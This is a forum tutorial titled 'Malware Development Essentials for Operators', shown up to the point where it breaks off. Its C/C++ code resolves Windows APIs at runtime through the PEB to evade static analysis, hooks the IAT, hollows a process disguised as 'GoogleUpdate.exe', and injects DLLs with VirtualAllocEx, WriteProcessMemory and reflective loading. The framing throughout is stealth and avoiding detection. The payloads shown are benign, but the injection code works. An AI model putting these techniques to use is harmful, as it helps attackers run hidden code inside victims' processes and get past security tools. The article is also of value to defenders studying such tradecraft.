Malware Development Essentials for Operators

0xf00I · November 8, 2023, 2:33am

Introduction

This article delves into the fundamentals and techniques of malware development for Windows. We’ll start by exploring the WinAPI and how code manipulation works in the context of malware development, covering things like loading functions dynamically, accessing the Process Environment Block (PEB), and executing functions in code. Next, we’ll look into obfuscation and payload encoding, using techniques like XOR and AES encryption to make our malicious code harder to detect. We’ll also explore ways to insert our code, like classic shellcode and DLL injection. To wrap things up, we’ll create a simple rootkit. As usual, we will dig into the code and techniques with a detailed, step-by-step breakdown.

Dynamic Function Loading and Execution

Time to dive into some naked code action! We’re gonna break down this code and make it crystal clear, so you can get what’s going on.

#include <windows.h>

int main(void) {
    MessageBoxA(0, "Foo Here.", "info", 0);
    return 0;
}

This is a simple program. It uses the MessageBoxA function, which is part of the Windows API. This function displays a modal dialog box with specified text and a caption. In this code, we’re making a straightforward call to the MessageBoxA function to show a message box.

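The reference to MessageBoxA is resolved at link time through an import library. The function’s code is not copied into your program; instead, the linker records USER32.dll and MessageBoxA in the executable’s import table, and the Windows loader fills in the address when the program starts. You don’t need to load anything yourself at runtime, but the function name is plainly visible to anyone who inspects the binary’s imports.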

Now, let’s contrast this with the following code:

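#include <windows.h>

// Function pointer type matching the MessageBoxA signature.
typedef int (WINAPI *def_MessageBoxA)(HWND, LPCSTR, LPCSTR, UINT);

int main(void) {
    size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA("USER32.dll"), "MessageBoxA");
    def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;
    msgbox_a(0, "Foo Here.", "info", 0);
    return 0;
}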

In this code, we take a different approach. We dynamically load and call the MessageBoxA function using the GetProcAddress function. This function retrieves the address of the MessageBoxA function from the USER32.dll library at runtime.

To work with this dynamically loaded function, we define a function pointer type def_MessageBoxA that matches the signature of the MessageBoxA function. We then cast the obtained function address to this function pointer and use it to call the function.

So, how is this related to malware? By resolving functions at runtime, we avoid listing suspicious APIs in the import table, so the binary no longer advertises which libraries and functions it uses. Calling those functions through pointers makes it more challenging for static analysis tools to identify the behavior of the code. Let’s take an example:

__declspec(dllexport) void func01() { MessageBoxA(0, "", "Function 1", 0); }
__declspec(dllexport) void func02() { MessageBoxA(0, "", "Function 2", 0); }

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        // Hook function func01
    }
    return TRUE;
}

In this example, we have a DLL with two exported functions, func01 and func02. Initially, both functions display message boxes. However, DllMain is executed automatically when the DLL is loaded, so a DLL that starts out with benign functionality could use dynamic function loading and function hooking there to change the behavior of func01 at runtime. So, let’s continue on this code manipulation journey, exploring dynamic function loading, PEB access, and function execution, which are essential concepts in understanding how code can be adapted and manipulated.

Before continuing, I would like to highlight at which step the PEB is created during process creation. When a program is started (calc.exe, for example), the parent process calls a Win32 API function, CreateProcess, which sends the OS a request to create the process and start its execution.

Creating the process data structures: Windows creates the EPROCESS structure in kernel land for the newly created calc.exe process.
Initializing the virtual memory: Windows then creates the process’s virtual address space and its mapping to physical memory and saves it inside the EPROCESS structure. It creates the PEB structure with all the necessary information, loads the two main DLLs that Windows applications will always need, ntdll.dll and kernel32.dll, and finally loads the PE file and starts execution.

The PEB can be accessed from user mode and contains process-specific information.
EPROCESS can only be accessed from kernel mode.

PEB Structure

The PEB is a data structure in the Windows operating system that contains information and settings related to a running process. The kernel-side process control block, by contrast, contains data that is only useful to the kernel, such as the preferred CPU for this process. The Thread Control Block is entirely different, and is what the kernel uses to manage threads, which are what the kernel runs at the lowest level.

The PEB is accessed to retrieve information about loaded modules, specifically the base addresses of dynamically linked libraries (DLLs). Let’s explore how the PEB is used in the code:

typedef struct _PEB_LDR_DATA {
ULONG Length;
UCHAR Initialized;
PVOID SsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID EntryInProgress;
} PEB_LDR_DATA, *PPEB_LDR_DATA; 

typedef struct _UNICODE_STRING32 {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING32, *PUNICODE_STRING32;

typedef struct _PEB32 {
    // ...
} PEB32, *PPEB32;

typedef struct _PEB_LDR_DATA32 {
    // ...
} PEB_LDR_DATA32, *PPEB_LDR_DATA32;

typedef struct _LDR_DATA_TABLE_ENTRY32 {
    // ...
} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;

As you can see, the PEB is a robust structure. The code defines several structures, such as PEB32, PEB_LDR_DATA32, and LDR_DATA_TABLE_ENTRY32, which are simplified versions of the actual PEB data structures. These structures contain fields that hold information about loaded modules and their locations in memory.

size_t GetModHandle(wchar_t *libName) {
    PEB32 *pPEB = (PEB32 *)__readfsdword(0x30); // fs:[0x30]
    PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

    for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
        LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
            curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks
        );
        printf("current node: %ls\n", data->BaseDllName.Buffer);
        if (StrStrIW(libName, data->BaseDllName.Buffer))
            return data->DllBase;
    }
    return 0;
}

The GetModHandle function accesses the PEB to find the base address of a loaded module. The PEB contains a data structure called PEB_LDR_DATA that manages information about loaded modules. The InMemoryOrderModuleList field of this structure is a linked list of loaded modules. The GetModHandle function iterates through this list and compares module names to find the desired module based on the libName parameter.
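The list walk itself is plain pointer arithmetic, so it can be tried without touching a real PEB. Here is a minimal, portable sketch of the same pattern on mock data: a circular doubly linked list whose links are embedded inside each record, plus a macro that steps back from the link to the record the way CONTAINING_RECORD does. Every name in it (list_entry, module_entry, CONTAINER_OF, find_module, demo_lookup) and every base address is made up for illustration and is not a Windows definition.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-ins for the Windows types; names and layout are simplified for illustration. */
typedef struct list_entry {
    struct list_entry *flink;   /* next node */
    struct list_entry *blink;   /* previous node */
} list_entry;

typedef struct module_entry {
    list_entry  load_links;     /* first embedded link, unused in this sketch */
    list_entry  memory_links;   /* the link the walk follows */
    uintptr_t   base;           /* mock module base address */
    const char *name;           /* mock module name */
} module_entry;

/* Same idea as CONTAINING_RECORD: step back from an embedded field to its struct. */
#define CONTAINER_OF(ptr, type, field) \
    ((type *)((char *)(ptr) - offsetof(type, field)))

/* Append a node to a circular list whose head is a bare list_entry. */
static void list_append(list_entry *head, list_entry *node) {
    assert(head != NULL && node != NULL);
    node->flink = head;
    node->blink = head->blink;
    head->blink->flink = node;
    head->blink = node;
}

/* Walk from head->flink until we are back at head; return the base on a name match. */
static uintptr_t find_module(list_entry *head, const char *name) {
    for (list_entry *cur = head->flink; cur != head; cur = cur->flink) {
        module_entry *m = CONTAINER_OF(cur, module_entry, memory_links);
        if (strcmp(m->name, name) == 0)
            return m->base;
    }
    return 0;
}

/* Build a three-module mock list and look one module up by name. */
static uintptr_t demo_lookup(const char *name) {
    list_entry head = { &head, &head };
    module_entry mods[3] = {
        { {NULL, NULL}, {NULL, NULL}, 0x400000, "app.exe" },
        { {NULL, NULL}, {NULL, NULL}, 0x770000, "ntdll.dll" },
        { {NULL, NULL}, {NULL, NULL}, 0x760000, "kernel32.dll" },
    };
    for (size_t i = 0; i < 3; i++)
        list_append(&head, &mods[i].memory_links);
    return find_module(&head, name);
}
```

Note that the link being followed is the second field of the record, not the first, which is exactly why the subtraction in the macro is needed: the pointer stored in the list points into the middle of the struct.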

The PEB can be found at fs:[0x30] in the Thread Environment Block for x86 processes as well as at GS:[0x60] for x64 processes.

Next we call the GetFuncAddr function, which will be used to locate the address of a specific function within a loaded module. It takes the moduleBase parameter, which is the base address of the module, and looks into the export table of the module to find the address of the function with the specified name (szFuncName). The export table is part of the module’s PE image in memory; the PEB only tells us where that image is loaded.

size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {

// parse export table
PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

// parse exported function info

PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

The function begins by parsing the export table of the loaded module to access information about its exported functions. The export table is part of the Portable Executable (PE) file format and contains details about functions that can be accessed externally.

It accesses the DOS header and the NT header to navigate to the Optional Header of the PE file.
It identifies the data directory for exports using the IMAGE_DIRECTORY_ENTRY_EXPORT index into the Optional Header’s data directory array.
It calculates the address of the export table, which holds data related to the module’s exported functions.

Next, inside the loop, it compares the current exported function’s name (sz_CurrApiName) with the target function name (szFuncName) using a case-insensitive comparison. When a match is found, the function prints information about the matching function, including its name and ordinal.

// lookup
for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;
if (!stricmp(sz_CurrApiName, szFuncName)) {
printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName); //enumeration process 
return moduleBase + arrFuncs[ num_CurrApiOrdinal - 1 ];
}
}
return 0;
}

If the target function name matches the current function name, the function returns the address of that function. It calculates the address by indexing the arrFuncs array: arrNameOrds[i] is already the index into arrFuncs, so the code adds 1 only to display a 1-based ordinal (which assumes an ordinal base of 1) and subtracts it again for the lookup. The array entry is an RVA, which is added to moduleBase to get the final address.
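The relationship between the three export arrays is easy to get wrong, so here is a small portable sketch of the name lookup on mock data. It assumes a made-up mock_exports struct and made-up RVAs rather than the real IMAGE_EXPORT_DIRECTORY, and it uses an ordinal base of 5 on purpose to show that the base only matters for the reported ordinal, not for the array index.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Mock export directory; field names are illustrative, not the real IMAGE_EXPORT_DIRECTORY. */
typedef struct mock_exports {
    uint32_t        base;            /* ordinal base */
    size_t          num_functions;
    size_t          num_names;
    const uint32_t *functions;       /* RVA per function, indexed by (ordinal - base) */
    const char    **names;           /* export names */
    const uint16_t *name_ordinals;   /* names[i] -> index into functions[] */
} mock_exports;

/* Returns the RVA for `name`, or 0 if absent. Writes the real ordinal when found. */
static uint32_t lookup_export(const mock_exports *ex, const char *name, uint32_t *ordinal_out) {
    assert(ex != NULL && name != NULL);
    for (size_t i = 0; i < ex->num_names; i++) {
        if (strcmp(ex->names[i], name) != 0)
            continue;
        uint16_t index = ex->name_ordinals[i];   /* already an index, no base applied */
        if (index >= ex->num_functions)
            return 0;                            /* malformed table, refuse to index */
        if (ordinal_out)
            *ordinal_out = ex->base + index;     /* the base only affects the reported ordinal */
        return ex->functions[index];
    }
    return 0;
}

/* Four functions, three of them exported by name. */
static const uint32_t     k_functions[]     = { 0x1000, 0x1040, 0x1080, 0x10c0 };
static const char        *k_names[]         = { "Alpha", "Beta", "Gamma" };
static const uint16_t     k_name_ordinals[] = { 2, 0, 3 };
static const mock_exports k_exports = { 5, 4, 3, k_functions, k_names, k_name_ordinals };
```

Looking up "Alpha" in this table goes names[0], then name_ordinals[0] which is 2, then functions[2]. The function at index 1 has no name at all and could only be reached by ordinal.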

Why is this important? Manual resolution like this is how injected code usually finds the APIs it needs, since it cannot rely on an import table, and it is dynamic function loading in its purest form. Now let’s take a look at the main function.

int main(int argc, char** argv, char** envp) {
    size_t kernelBase = GetModHandle(L"kernel32.dll");
    printf("[+] GetModHandle(kernel32.dll) = %p\n", (void *)kernelBase); // result of `GetModHandle`

    size_t ptr_WinExec = (size_t)GetFuncAddr(kernelBase, "WinExec");
    printf("[+] GetFuncAddr(kernel32.dll, WinExec) = %p\n", (void *)ptr_WinExec); // the address of `WinExec`
    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);
    return 0;
}

We call the GetModHandle function to find the base address of the “kernel32.dll” module in the current process. It uses the PEB to traverse the list of loaded modules and searches for the one with the specified name. Next we call GetFuncAddr to locate the address of WinExec, passing the base address of “kernel32.dll” obtained in the previous step and the function name “WinExec” as arguments. Finally, the code dynamically invokes the WinExec function using the address obtained earlier. It casts ptr_WinExec to the appropriate function pointer type and calls it with the arguments “calc” (to run the Windows Calculator) and SW_SHOW.

This demonstrates how to dynamically locate and execute the WinExec function from the “kernel32.dll” module, effectively opening the Calculator. It shows how code manipulation can be achieved by accessing the PEB and locating and using specific functions from loaded modules.

Alright, let’s back up a little bit and look at this in the context of code injection. Here’s the line to explore further:

((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)("calc", SW_SHOW);

This line dynamically invokes the WinExec function to open the Windows Calculator. Now, let’s break down what’s happening here:

(UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec involves typecasting the ptr_WinExec pointer into a function pointer with the appropriate signature. This typecasting is crucial to match the required parameters of the WinExec function, which includes a string (LPCSTR) and an integer (UINT).
("calc", SW_SHOW) represents the arguments passed to the WinExec function. In this instance, it instructs the system to open the Windows Calculator (“calc”) with a specified display mode (SW_SHOW).
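The cast is easier to read when it is split into a typedef and a named pointer. Here is a minimal portable sketch of the same idea, assuming a made-up add function in place of WinExec: the address travels as a plain integer, gets cast back to a function pointer with the right signature, and is then called. The names add_fn, resolve_add, and call_resolved are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* The signature we expect the address to have (hypothetical example function). */
typedef int (*add_fn)(int, int);

static int add(int a, int b) { return a + b; }

/* Pretend this came from a runtime lookup: the address travels as a plain integer. */
static uintptr_t resolve_add(void) {
    return (uintptr_t)&add;
}

/* Cast the integer back to the right function pointer type, then call through it. */
static int call_resolved(uintptr_t addr, int a, int b) {
    assert(addr != 0);
    add_fn fn = (add_fn)addr;
    return fn(a, b);
}
```

The compiler cannot check anything about the cast, so the typedef has to match the real function exactly. With the Windows API that includes the calling convention, which is why WINAPI appears inside the cast in the article’s code.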

In essence, what’s occurring here is:

The code resolves and invokes WinExec entirely at runtime. Rather than importing WinExec, it locates the function through the PEB and the export table and calls it through a pointer. Nothing is injected into another process here, but this is the same resolution step that injected code relies on, since it cannot count on an import table of its own. Dynamic function loading is often employed in malware to access specific functions without direct imports, making it more evasive.

It’s important to note that in this code example, opening the Windows Calculator is a benign action. However, it serves as an illustrative case of the dynamic function invocation that code injection builds on.

Dynamic Function Loading (IAT Hooking)

Dynamic Function Loading is a technique used in the realm of Windows programming and sometimes in malware development to load and execute functions at runtime. A closely related technique is “Import Address Table (IAT) Hooking.” The IAT contains the addresses of functions that a module (such as a DLL or executable) imports from other modules. IAT hooking allows us to intercept and modify function calls by manipulating the IAT.

IAT table looks something like:

                Application                                               mydll
           +-------------------+                                  +--------------------+
           |                   |                                  |       MessageBoxA  |
           |                   |                    +------------>---------------------+
           | call MessageBoxA  |               IAT  |             |  ....              |
           |                   |       +-------------------+      |(kernel32!MsgBoxA)  |
           +-------------------+       |            |      |      |  ....              |
                             +----------> jmp       +      |      +--------------------+
                                       |                   |      |                    |
                                       +-------------------+      +--------------------+

First, the target program calls the WinAPI MessageBoxA function. The program looks up the MessageBoxA address in the IAT, and code execution jumps to the resolved user32!MessageBoxA address, where the legitimate code for displaying the message box lives (the diagram labels it kernel32, but MessageBoxA is exported by USER32.dll). The two helper macros below locate the NT headers and the section header array of a mapped image; the hook code further down uses the first one to find the import table:

#define getNtHdr(buf) ((IMAGE_NT_HEADERS *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew))
#define getSectionArr(buf) ((IMAGE_SECTION_HEADER *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew + sizeof(IMAGE_NT_HEADERS)))

The application code makes a function call to MessageBoxA. When the application makes this call, it does not directly call the function’s code. Instead, it looks up the address of the function in the IAT, which contains entries for the imported functions. Once the address of MessageBoxA is resolved in the IAT, code execution jumps to that resolved address. In this case, the resolved address points to the legitimate user32!MessageBoxA function.

size_t ptr_msgboxa = 0;
void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr)
{
    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
    for (; impModuleList->Name; impModuleList++)
    {
        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
        for (int i = 0; arr_apiNames[i].u1.Function; i++)
        {
            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name))
            {
                apiAddr = arr_callVia[i].u1.Function;
                arr_callVia[i].u1.Function = callback;
                break;
            }
        }
    }
}

int main(int argc, char **argv)
{
    void (*ptr)(UINT, LPCSTR, LPCSTR, UINT) = [](UINT hwnd, LPCSTR lpText, LPCSTR lpTitle, UINT uType) {
        printf("[hook] MessageBoxA(%i, \"%s\", \"%s\", %i)", hwnd, lpText, lpTitle, uType);
        ((UINT(*)(UINT, LPCSTR, LPCSTR, UINT))ptr_msgboxa)(hwnd, "msgbox got hooked", "alert", uType);
    };

    iatHook((char *)GetModuleHandle(NULL), "MessageBoxA", (size_t)ptr, ptr_msgboxa);
    MessageBoxA(0, "Hook Test", "title", 0);
    return 0;
}

So what’s going on here? Instead of executing the legitimate user32!MessageBoxA function, the IAT entry for MessageBoxA is modified to point to a replacement function (the ptr function in the code). As a result, when the application makes a call to MessageBoxA, it actually calls the replacement function, which can alter or extend the behavior of the original function call.
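Stripped of the PE parsing, the mechanism is just an indirect call through a writable slot. Here is a minimal portable sketch of that idea, assuming a one-entry table in place of the IAT and a made-up real_greet function in place of MessageBoxA. All names here (import_slot, hooked_greet, install_hook, app_call) are hypothetical, and no Windows structures are involved.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef int (*greet_fn)(const char *);

/* Stand-in for the real API: returns the length of the text it was given. */
static int real_greet(const char *text) { return (int)strlen(text); }

/* One-slot "import table": callers never call real_greet directly, only through the slot. */
static greet_fn import_slot = real_greet;

static greet_fn saved_original = NULL;
static int      hook_calls = 0;

/* Replacement: records the call, then forwards to the saved original. */
static int hooked_greet(const char *text) {
    assert(saved_original != NULL);
    hook_calls++;
    return saved_original(text);
}

/* Swap the slot and remember what was there, like apiAddr in the code above. */
static void install_hook(void) {
    saved_original = import_slot;
    import_slot = hooked_greet;
}

/* The "application": an indirect call through the slot. */
static int app_call(const char *text) { return import_slot(text); }
```

The calling code never changes. Only the slot does, which is why saving the original pointer matters: without it the replacement has no way to forward the call.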

Process Hollowing

Process hollowing is a technique that begins with the creation of a new instance of a legitimate process in a suspended state. Because the process is suspended, its memory can be replaced before any of its own code runs, so the injected code ends up executing within the context of this process.

To successfully perform process hollowing, the source image (the executable being injected into the legitimate process) must meet specific requirements and characteristics to ensure that the technique works effectively. These requirements include:

PE Format: The source image must be in the Portable Executable (PE) format, which is the standard executable file format on Windows. This format includes headers and sections that define the structure of the executable.
Executable Code: The source image should contain executable code that can be run by the Windows operating system. This code is typically located within the .text section of the PE file.
Address of Entry Point: The PE header of the source image must specify the address of the entry point, which is the starting point for the execution of the code. The address of the entry point is used to set the EAX register in the context of the suspended process.
Sections and Data: The source image should contain necessary sections, such as the .text section for code and other sections for data. These sections should be properly defined in the PE header, and the data should be accessible and relevant to the code’s execution.
Relocation Table: The source image may have a relocation table that allows it to be loaded at a different base address. If the source image lacks a relocation table, it may only work if it can be loaded at its preferred base address.

Creating the Process

The target process must be created in the suspended state. The code aims to create a new instance of a process in a suspended state and subsequently replace its code and data with the code and data from another executable (the source image), which includes creating a suspended process and performing memory operations to load the new image.

// Create a new instance of current process in suspended state, for the new image.
if (CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI)) 
{
    // Allocate memory for the context.
    CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
    CTX->ContextFlags = CONTEXT_FULL; // Context is allocated

    // Retrieve the context.
    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
    {
        pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
            NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

        // File Mapping
        WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
        for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
            WriteProcessMemory
            (
                PI.hProcess, 
                LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
                LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
                SectionHeader[i].SizeOfRawData, 
                0
            );
    }
}

The CreateProcessA function is used to create a new instance of the current process (or another specified executable). The CREATE_SUSPENDED flag creates the process in a suspended state, meaning its execution is paused. After creating the suspended process, memory is allocated using VirtualAlloc to hold the thread context. The context structure (CTX) is used to capture information about the execution state of the process’s main thread.

Retrieving and Updating Context

The GetThreadContext function is called to retrieve the context of the suspended process’s main thread (PI.hThread). The context is stored in the CTX structure.
The code then copies the headers (PE header) of the source image into the allocated memory within the suspended process using WriteProcessMemory. This is crucial for ensuring that the new image is loaded correctly. A loop iterates through the sections of the source image (SectionHeader) and copies the section data from the source image to the corresponding memory locations within the suspended process using WriteProcessMemory. This step is essential to load the code and data. The context itself is updated afterwards: the EAX register is set to the address of the entry point of the new code.

At this point, the hollowing is set up, and the new image’s code and data have been loaded into the memory of the suspended process. What remains is to point the thread at the new entry point and resume it, allowing the new image to execute within the context of the suspended process.

WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&pImageBase), 4, 0);
CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
ResumeThread(PI.hThread);

The destination address is calculated as CTX->Ebx + 8, and 4 bytes of data are written. In a freshly created suspended x86 process, EBX points to the PEB, and offset 8 holds the ImageBaseAddress field, so this write records where the new image lives.

CTX->Eax is updated with the address of the new code’s entry point. For a suspended 32-bit process, the thread start routine takes its entry point from EAX, so this effectively decides where execution begins. The entry point address is obtained from the PE header of the source image: NtHeader->OptionalHeader.AddressOfEntryPoint. Finally, the ResumeThread function is called to resume the execution of the suspended process. At this point, the process begins executing the injected code, starting from the entry point that was set, and the injected code takes control of the process’s execution.

char CurrentFilePath[MAX_PATH + 1];
GetModuleFileNameA(0, CurrentFilePath, MAX_PATH);
if (strstr(CurrentFilePath, "GoogleUpdate.exe")) {
MessageBoxA(0, "foo", "", 0);
return 0;

LONGLONG len = -1;
RunPortableExecutable("GoogleUpdate.exe", MapFileToMemory(CurrentFilePath, len));
return 0;
}

Once the application is run, GetModuleFileNameA is used to retrieve the full path of the currently running executable (the application itself). A conditional check using strstr examines CurrentFilePath. If the file path contains “GoogleUpdate.exe”, the code displays a message box with the message “foo” and an empty title using the MessageBoxA function, then returns. Otherwise, it proceeds with the process hollowing technique: it calls the RunPortableExecutable function with “GoogleUpdate.exe” as the target process and passes its own image, mapped into memory, as the source image. This is a simple example.

DLL injection Techniques

DLL injection is the act of introducing code into a currently executing process. Typically, the code we introduce takes the form of a dynamic link library (DLL) since DLLs are designed to be loaded as needed during runtime. However, this doesn’t preclude us from injecting assembly code or other forms of code (such as executables or handwritten code). It’s crucial to bear in mind that you must possess the necessary level of privileges on the system to engage in memory manipulation within other programs.

The Windows API provides a range of functions that enable us to attach to and manipulate other programs, primarily for debugging purposes. We will make use of these methods to execute DLL injection. I’ve divided the DLL injection process into four distinct steps:

Attach to the process
Allocate Memory within the process
Copy the DLL or the DLL Path into the process’s memory and determine appropriate memory addresses
Instruct the process to Execute your DLL

Each one of these steps can be accomplished through the use of one or more programming techniques, which are summarized below. It’s important to understand the details/options present for each technique as they all have their positives and negatives.

LoadLibrary: Using the LoadLibrary function to load a DLL into a process.
CreateRemoteThread: Injecting a DLL using the CreateRemoteThread function.
SetWindowsHookEx: Using Windows hooks to inject code into other processes.
Process Hollowing: Replacing the code and data of a legitimate process with a malicious DLL.

We have a couple of options (e.g. CreateRemoteThread(),NtCreateThreadEx(), etc…) when instructing the target process to launch our DLL. Unfortunately we can’t just provide the name of our DLL to these functions, instead we have to provide a memory address to start execution at. We perform the Allocate and Copy steps to obtain space within the target process’ memory and prepare it as an execution starting point.

There are two popular starting points: LoadLibraryA() and jumping to DllMain.

`LoadLibraryA()`

LoadLibraryA() is a kernel32.dll function used to load DLLs, executables, and other supporting libraries at run time. It takes a filename as its only parameter and magically makes everything work. This means that we just need to allocate some memory for the path to our DLL and set our execution starting point to the address of LoadLibraryA(), providing the memory address where the path lies as a parameter.

The major downside to LoadLibraryA() is that it registers the loaded DLL with the program and thus can be easily detected. Another slightly annoying caveat is that if a DLL has already been loaded once with LoadLibraryA(), loading it again only bumps its reference count and DllMain does not run a second time. You can work around this issue but it’s more code.

Jumping to `DllMain` (or another entry point)

An alternative method to LoadLibraryA() is to load the entire DLL into memory, then determine the offset to the DLL’s entry point. Using this method you can avoid registering the DLL with the program (stealthy) and repeatedly inject into a process.

Attaching to the Process

First we’ll need a handle to the process so that we can interact with it. This is done with the OpenProcess() function. We’ll also need to request certain access rights in order to perform the tasks below. The specific access rights we request vary across Windows versions, however the following should work for most:

hHandle = OpenProcess( PROCESS_CREATE_THREAD | 
                       PROCESS_QUERY_INFORMATION | 
                       PROCESS_VM_OPERATION | 
                       PROCESS_VM_WRITE | 
                       PROCESS_VM_READ, 
                       FALSE, 
                       procID );

Before we can inject anything into another process, we’ll need a place to put it. We’ll use the VirtualAllocEx() function to do so.

VirtualAllocEx() takes the amount of memory to allocate as one of its parameters. If we use LoadLibraryA(), we’ll allocate space for the full path of the DLL, and if we jump to DllMain, we’ll allocate space for the DLL’s full contents.

DLL Path

Allocating space for just the DLL path slightly reduces the amount of code you’ll need to write but not by much. It also requires you to use the LoadLibraryA() method which has some downsides (described above). That being said, it is a very popular method.

Use VirtualAllocEx() and allocate enough memory to support a string which contains the path to the DLL:

GetFullPathName(TEXT("foo.dll"), 
                BUFSIZE, 
                dllPath, //Output to save the full DLL path
                NULL);

dllPathAddr = VirtualAllocEx(hHandle, 
                             0, 
                             strlen(dllPath), 
                             MEM_RESERVE|MEM_COMMIT, 
                             PAGE_EXECUTE_READWRITE);

Full DLL

Allocating space for the full DLL requires a little more code however it’s also much more reliable and doesn’t need to use LoadLibraryA().

First, open a handle to the DLL with CreateFileA() then calculate its size with GetFileSize() and pass it to VirtualAllocEx():


GetFullPathName(TEXT("foo.dll"), 
                BUFSIZE, 
                dllPath, //Output to save the full DLL path
                NULL);

hFile = CreateFileA( dllPath, 
                     GENERIC_READ, 
                     0, 
                     NULL, 
                     OPEN_EXISTING, 
                     FILE_ATTRIBUTE_NORMAL, 
                     NULL );

dllFileLength = GetFileSize( hFile, 
                             NULL );

remoteDllAddr = VirtualAllocEx( hProcess, 
                                NULL, 
                                dllFileLength, 
                                MEM_RESERVE|MEM_COMMIT, 
                                PAGE_EXECUTE_READWRITE );

Now that we have space allocated in our target process, we can copy our DLL Path or the Full DLL (depending on the method you choose) into that process. We’ll use WriteProcessMemory() to do so:

DLL Path


WriteProcessMemory(hHandle, 
                   dllPathAddr, 
                   dllPath, 
                   strlen(dllPath), 
                   NULL);

Full DLL

We’ll first need to read our DLL into memory before we copy it to the remote process.


lpBuffer = HeapAlloc( GetProcessHeap(), 
                      0, 
                      dllFileLength); 

ReadFile( hFile, 
          lpBuffer, 
          dllFileLength, 
          &dwBytesRead, 
          NULL );

WriteProcessMemory( hProcess, 
                    lpRemoteLibraryBuffer, 
                    lpBuffer,  
                    dllFileLength, 
                    NULL );

Determining our Execution Starting Point

Most execution functions take a memory address to start at, so we’ll need to determine what that will be.

DLL Path and `LoadLibraryA()`

We’ll search our own process memory for the starting address of LoadLibraryA(), then pass it to our execution function with the memory address of the DLL path as its parameter. To get LoadLibraryA()'s address, we’ll use GetModuleHandle() and GetProcAddress():

loadLibAddr = GetProcAddress(GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA");

Full DLL and Jump to `DllMain`

By copying the entire DLL into memory we can avoid registering our DLL with the process and more reliably inject. The somewhat difficult part of doing this is obtaining the entry point to our DLL when it’s loaded in memory. So we’ll use the GetReflectiveLoaderOffset() function from the ReflectiveDLLInjection project to determine the offset within our own process’s memory, then use that offset plus the base address of the memory in the victim process we wrote our DLL to as the execution starting point. It’s important to note here that the DLL we’re injecting must be compiled with the appropriate includes and options so that it aligns itself with the ReflectiveDLLInjection method.

dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpWriteBuff);

Executing the DLL!

At this point we have our DLL in memory and we know the memory address we’d like to start execution at. All that’s really left is to tell our process to execute it. There are a couple of ways to do this.

`CreateRemoteThread()`

The CreateRemoteThread() function is probably the most widely known and used method. It’s very reliable and works most of the time; however, you may want to use another method to avoid detection, or in case Microsoft changes something that causes CreateRemoteThread() to stop working.

